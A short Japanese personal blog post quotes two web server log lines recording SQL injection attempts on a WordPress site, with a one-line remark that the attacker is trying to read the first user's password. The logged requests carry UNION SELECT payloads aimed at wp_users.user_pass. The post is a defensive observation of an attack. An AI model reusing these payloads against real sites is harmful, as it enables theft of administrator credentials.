まとまりのないブログ

something which something is something

sql Tips wordpress

sqlインジェクション

投稿日: 

ns.km22518.keymachine.de - - [19/Jul/2008:22:25:12 +0900] "GET /wordpress/index.php?cat=%27+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1" 200 14883 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
ns.km22518.keymachine.de - - [19/Jul/2008:22:25:14 +0900] "GET /wordpress/index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1" 200 14877 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"

パスワードを割り出そうとしているのか。wordpressのユーザidの1番目のパスワードをselectで取得しようとしているのがログから読み取れる。

-sql, Tips, wordpress

執筆者:

comment

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

日本語が含まれない投稿は無視されますのでご注意ください。(スパム対策)

関連記事

no image

Kubernetesってなんぞ

サーバーとかクラスターとかをググっているとKubernetesなる単語の記事を目にするようになったので調べ見たがよくわからない。Kubernetesって何かぐぐってみたらコンテナを管理するなんとかと出 …

no image

DDR2 800 と 667 の互換

DDR2 800MHzの規格のメモリをDDR2 667対応マザーに装着してみようとしたら,ビープ音が鳴って拒否された。下位互換はないのかなぁ。逆の,DDR2 667MHzの規格のメモリをDDR2 80 …

no image

失敗:linux ubuntuのHDD引っ越し作業

失敗というか,手間と時間がかかりすぎる。OSをクリーンインストールして外付けHDDにそれを引越ししてみるという実験を試みたが,時間がかかりすぎる上に起動不能という結果に。ディスクそのままのコピーではな …

no image

System.Data.OleDb.OleDbException: ファイル ’ファイルパス ’ が見つかりませんでした。

データベースファイルを相対指定にしていて、openfiledialogでローカルのファイルを選択後に、データベースのファイルの指定が絶対指定に変わってしまった。その結果、当然ながらデータベース接続エラ …

no image

テーブルのフィールドのデータ型を調べる

プログラムで使っているテーブルのあるフィールドが設計ミスで使われていないことに気づき、せっかくだからそのフィールドのデータ型を変えて別の用途に使ってみようというトリッキーなことをやろうとしたけれど、や …

PREV
フレームワークの有効性
NEXT
mysqlへjdbc接続した場合に文字化けが発生する

no image

2023/12/07

Can not extract resource from inner element must either be a resource : android studio

no image

2023/07/17

HAPROXYを使ってmysqlサーバーの負荷分散

no image

2023/07/12

html5でcanvas要素の下部に7pxのマージンが発生してしまう件

no image

2023/06/29

クラファンでゲームを企画したが失敗した事例まとめ

no image

2023/06/22

眼鏡のフレームが折れたんで修理した

最近のコメント

カテゴリー

固定ページ

メタ情報